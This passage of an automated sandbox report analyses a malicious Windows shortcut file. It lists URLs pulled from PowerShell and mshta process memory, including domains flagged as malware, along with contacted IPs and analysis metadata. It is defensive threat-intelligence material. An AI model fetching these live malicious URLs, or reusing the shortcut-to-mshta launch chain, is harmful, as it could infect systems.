                https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5false
                  		high
                  https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33false
                    		high
                    https://enduresopens.com/ttkXIvunodY/69489true
                    • Avira URL Cloud: malware
                    		unknown
                    https://counter.yadro.ru/hit?q;t44.11;r;s1280*1024*32;uhttps%3A//goo.su/J3JHqIi;hRedirecting;0.009693880063321946false
                      		high
                      https://an.yandex.ru/system/context.jsfalse
                        		high
                        https://goo.su/J3JHqIifalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://enduresopens.com/ttkXIvunodY/69489oto:400&display=swapapmshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: malware
                          		unknown
                          https://goo.su/J3JHqIihttps://enduresopens.com/ttkXIvunodY/69489mshta.exe, 00000008.00000002.2539215239.0000014F38EE3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://richinfo.co/zmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://goo.su/Jpowershell.exe, 00000007.00000002.1309161789.00000289009EB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1309161789.0000028900A46000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://counter.yadro.ru/mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5smshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33EcxUmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://goo.su/mshta.exe, 00000008.00000002.2536346669.0000014F35E38000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://enduresopens.com/mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://enduresopens.com/ttkXIvunodY/69489pmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33DAmshta.exe, 00000008.00000002.2538123104.0000014F36B60000.00000004.00000020.00020000.00000000.sdmptrue
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33XXC:mshta.exe, 00000008.00000003.1369140620.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://goo.su/J3JHqIi-mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://richinfo.co/mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://yastatic.net/partner-code-bundles/1176431/mshta.exe, 00000008.00000003.1404399990.0000014F38D5C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38E48000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406469336.0000014F3C152000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://goo.su/J3JHqIi)mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://goo.su/JXpowershell.exe, 00000007.00000002.1309161789.00000289009EB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://goo.su/J3JHqIi&mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://goo.su/&mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://privacy-cs.mail.ru/static/sync-loader.jsmshta.exe, 00000008.00000003.1405909985.0000014F36ACB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538565091.0000014F38CE5000.00000004.00000020.00020000.00000000.sdmp, code[1].js.8.drfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.1309161789.0000028900565000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://goo.su/J3JHqIi%Jmshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://top-fwz1.mail.ru/Zmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://github.com/googlefonts/opensans)mshta.exe, 00000008.00000003.1404399990.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539503014.0000014F3AA92000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539155100.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://goo.su/mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404399990.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://top-fwz1.mail.ru/js/code.jsuD2qF6mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://enduresopens.com/ttkXIvunodY/69489-cl-ob.js?pubid=883146&siteid=330256&niche=33/6mshta.exe, 00000008.00000003.1404980558.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmptrue
                                                                      • Avira URL Cloud: malware
                                                                      		unknown
                                                                      https://ad.mail.ru/retarget/?counter=a.idmshta.exe, 00000008.00000003.1405909985.0000014F36ACB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://goo.su/J3JHqIic=C:mshta.exe, 00000008.00000002.2535920736.0000014734300000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://crl.ver)svchost.exe, 0000000B.00000002.2537389371.000002576A40F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5105mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://cndef1.green-pathways.shop/api/uz/7552973650/index.mp4mshta.exe, 00000008.00000003.1369140620.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406447403.0000014734139000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36BD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              https://goo.su/J3JHqIiAFpowershell.exe, 00000007.00000002.1310805520.000002891870E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://goo.su/J3JHqIierMutexmshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://g.live.com/odclientsettings/Prod1C:qmgr.db.11.drfalse
                                                                                    		high
                                                                                    https://github.com/googlefonts/opensans)Thread-00001d7c-Id-00000000mshta.exe, 00000008.00000002.2539543137.0000014F3AFA7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1390051694.0000014F36AEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://counter.yadro.ru/Yumshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://goo.su/J3JHqIiA%powershell.exe, 00000007.00000002.1310805520.000002891870E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://fonts.googleapismshta.exe, 00000008.00000003.1406447403.0000014734139000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://www.liveinternet.ru/clickHzRXeNBmshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://enduresopens.com/ttkXIvunodY/69489eflatemshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                            • Avira URL Cloud: malware
                                                                                            		unknown
                                                                                            https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33Nmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://goo.su/uumshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33Imshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33Fmshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://top-fwz1.mail.ru/js/code.jsImshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://goo.su/J3JHqIi...p.rmshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://enduresopens.com/ttkXIvunodY/69489n.mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                        • Avira URL Cloud: malware
                                                                                                        		unknown
                                                                                                        https://goo.sumshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://goo.su/J3JHqIiC:mshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734050000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://top-fwz1.mail.ru/counter?id=3128781;js=namshta.exe, 00000008.00000003.1369140620.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36BD1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36BF2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362063613.0000014F36BFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362305846.0000014F36BFD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1369140620.0000014F36BC3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1369112341.0000014F36BF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1362474328.0000014F36BFD000.00000004.00000020.00020000.00000000.sdmp, J3JHqIi[1].htm.8.drfalse
                                                                                                              		high
                                                                                                              https://top-fwz1.mail.ru/js/code.jsjs?id=399eaf833ac5f607b305c4ace0c25eb5/=mshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://enduresopens.com/ttkXIvunodY/69489Sl8mshta.exe, 00000008.00000003.1405409731.0000014F36C5D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C5D000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                • Avira URL Cloud: malware
                                                                                                                		unknown
                                                                                                                https://goo.su/J3JHqIiymshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://goo.su/J3JHqIitmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://top-fwz1.mail.ru/js/code.jshmshta.exe, 00000008.00000002.2535430577.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://goo.su/6Bmshta.exe, 00000008.00000003.1404399990.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://top-fwz1.mail.ru/js/code.jspmshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://top-fwz1.mail.ru/js/code.jswmshta.exe, 00000008.00000002.2538729752.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://enduresopens.com/ttkXIvunodY/69489C:mshta.exe, 00000008.00000002.2538565091.0000014F38CD0000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                            • Avira URL Cloud: malware
                                                                                                                            		unknown
                                                                                                                            https://top-fwz1.mail.ru/mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38D1F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404841844.0000014F38D21000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://scripts.sil.org/OFLOpenSans-RegularVersionmshta.exe, 00000008.00000003.1404399990.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539155100.0000014F38EB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://counter.yadro.ru/hit?t44.11;r;s1280mshta.exe, 00000008.00000002.2538565091.0000014F38CD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://goo.su/J3JHqIi::mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://www.liveinternet.ru/clickmshta.exe, 00000008.00000003.1404399990.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406072701.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://csp.withgoogle.com/csp/bcfae741e379a885f2ab2cf83ebe6d32/mr.mshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://www.apache.org/licenses/LICENSE-2.0mshta.exe, 00000008.00000002.2539543137.0000014F3AFA7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2539503014.0000014F3AA92000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2537391101.0000014F36A67000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://goo.su/J3JHqIiRmshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://goo.su/J3JHqIi.dllzmshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5XXC:mshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://richinfo.co/richpartners/push/js/rp-cl-ob.js?pubid=883146&siteid=330256&niche=33/6mshta.exe, 00000008.00000003.1369112341.0000014F36BF7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb50fmshta.exe, 00000008.00000002.2535430577.0000014734104000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.0000014734104000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://ad.mail.ru/retarget/?counter=mshta.exe, 00000008.00000003.1404399990.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1406072701.0000014F38E4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2540906928.0000014F3CB20000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1403798862.0000014F38E4F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538565091.0000014F38CE5000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D63000.00000004.00000020.00020000.00000000.sdmp, code[1].js.8.drfalse
                                                                                                                                                      		high
                                                                                                                                                      https://goo.su/J3JHqIiHmshta.exe, 00000008.00000002.2535291275.0000014734010000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://goo.su/4mshta.exe, 00000008.00000002.2538729752.0000014F38D28000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://scripts.sil.org/OFLWeightWidthNormalItalicRomanmshta.exe, 00000008.00000002.2539543137.0000014F3AFA7000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1390051694.0000014F36AEC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://goo.su/J3JHqIiEmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://goo.su/J3JHqIiFmshta.exe, 00000008.00000002.2535430577.00000147340C6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.00000147340C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://top-fwz1.mail.ru/js/code.jstSmshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 0000000B.00000003.1371346864.000002576A1F0000.00000004.00000800.00020000.00000000.sdmp, edb.log.11.dr, qmgr.db.11.drfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://goo.su/J3JHqIirogramshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://goo.su/J3JHqIiApowershell.exe, 00000007.00000002.1310805520.000002891870E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://goo.su/frontend/js/redirect.js?id=399eaf833ac5f607b305c4ace0c25eb5Zfmshta.exe, 00000008.00000002.2538123104.0000014F36B7E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://enduresopens.com/ttkXIvunodY/69489Internetmshta.exe, 00000008.00000003.1380719682.000001473408C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.0000014734076000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://top-fwz1.mail.ru/js/code.jsC:mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://top-fwz1.mail.ru/js/code.jsjsmshta.exe, 00000008.00000002.2538123104.0000014F36C5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://goo.su/J3JHqIi/code.js4mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://goo.su/J3JHqIi...mshta.exe, 00000008.00000003.1406447403.0000014734139000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538123104.0000014F36C13000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2535430577.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368445738.0000014F36C17000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1404980558.0000014F36C12000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1368890826.000001473413B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000003.1380719682.000001473411D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://goo.su/J3JHqIippowershell.exe, 00000007.00000002.1309161789.0000028900541000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://top-fwz1.mail.ru/js/code.js(mshta.exe, 00000008.00000002.2538123104.0000014F36BCD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000008.00000002.2538729752.0000014F38D7F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://goo.su/J3JHqIilpowershell.exe, 00000007.00000002.1311703716.000002897E173000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://top-fwz1.mail.rumshta.exe, 00000008.00000002.2538565091.0000014F38CE5000.00000004.00000020.00020000.00000000.sdmp, code[1].js.8.drfalse
                                                                                                                                                                                          		high

                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                          Public IPs

                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                          213.180.204.90
                                                                                                                                                                                          		an.yandex.ruRussian Federation
                                                                                                                                                                                          		13238YANDEXRUfalse
                                                                                                                                                                                          95.163.52.67
                                                                                                                                                                                          		top-fwz1.mail.ruRussian Federation
                                                                                                                                                                                          		21051NIVAL-ASRUfalse
                                                                                                                                                                                          109.200.199.111
                                                                                                                                                                                          		richinfo.coNetherlands
                                                                                                                                                                                          		49544I3DNETNLfalse
                                                                                                                                                                                          23.109.170.83
                                                                                                                                                                                          		enduresopens.comNetherlands
                                                                                                                                                                                          		7979SERVERS-COMUSfalse
                                                                                                                                                                                          172.67.139.105
                                                                                                                                                                                          		goo.suUnited States
                                                                                                                                                                                          		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                          88.212.201.204
                                                                                                                                                                                          		counter.yadro.ruRussian Federation
                                                                                                                                                                                          		39134UNITEDNETRUfalse

                                                                                                                                                                                          Private

                                                                                                                                                                                          IP
                                                                                                                                                                                          127.0.0.1

                                                                                                                                                                                          General Information

                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                          Analysis ID:1576543
                                                                                                                                                                                          Start date and time:2024-12-17 08:42:16 +01:00
                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                          Overall analysis duration:0h 5m 25s
                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                          Report type:full
                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                          Number of analysed new started processes analysed:16
                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                          Technologies:
                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                          Sample name:bxAoaISZJQ.lnk
                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                          Original Sample Name:829cc902dbf7a10c6de99c6a0029e65d71e250d45a2a3baa8776699d22e5ee58.lnk.d.lnk
                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                          Classification:mal80.winLNK@9/26@6/7
                                                                                                                                                                                          EGA Information:Failed
                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                          • Number of executed functions: 19
                                                                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                          • Found application associated with file extension: .lnk

                                                                                                                                                                                          Warnings

                                                                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
